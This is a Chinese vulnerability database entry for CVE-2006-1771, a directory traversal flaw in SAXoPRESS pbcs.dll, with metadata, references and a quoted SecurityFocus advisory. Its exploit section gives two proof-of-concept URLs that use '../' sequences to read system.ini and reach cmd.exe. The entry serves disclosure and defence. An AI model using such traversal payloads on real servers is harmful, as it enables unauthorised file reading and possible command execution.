SAXoTECH SAXoPRESS pbcs.dll 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110040 漏洞类型 路径遍历
发布时间 2006-04-11 更新时间 2007-02-20
CVE编号 CVE-2006-1771 CNNVD-ID CNNVD-200604-202
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27627
https://www.securityfocus.com/bid/17474
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-202
|漏洞详情
SAXoTECHSAXoPRESS,即SaxotechOnline(正式名称为Publicus)中的pbcs.dll存在目录遍历漏洞。这使得远程攻击者可以借助于url参数(参数值设置为'..')读取任意文件并可能执行任意程序。
|漏洞EXP
source: http://www.securityfocus.com/bid/17474/info

SAXoPRESS is prone to a directory-traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker can exploit this vulnerability to retrieve and execute arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks.

http://www.example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini
http://www.example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe
|受影响的产品
SAXOTECH SAXoPRESS 0
|参考资料

来源:XF
名称:saxopress-pbcs-directory-traversal(25768)
链接:http://xforce.iss.net/xforce/xfdb/25768
来源:BID
名称:17474
链接:http://www.securityfocus.com/bid/17474
来源:BUGTRAQ
名称:20060412Re:SAXoPRESS-directorytraversalakaSaxotechOnline
链接:http://www.securityfocus.com/archive/1/archive/1/431037/30/5580/threaded
来源:BUGTRAQ
名称:20060411SAXoPRESS-directorytraversal
链接:http://www.securityfocus.com/archive/1/archive/1/430707/100/0/threaded
来源:VUPEN
名称:ADV-2006-1327
链接:http://www.frsirt.com/english/advisories/2006/1327
来源:SECUNIA
名称:19566
链接:http://secunia.com/advisories/19566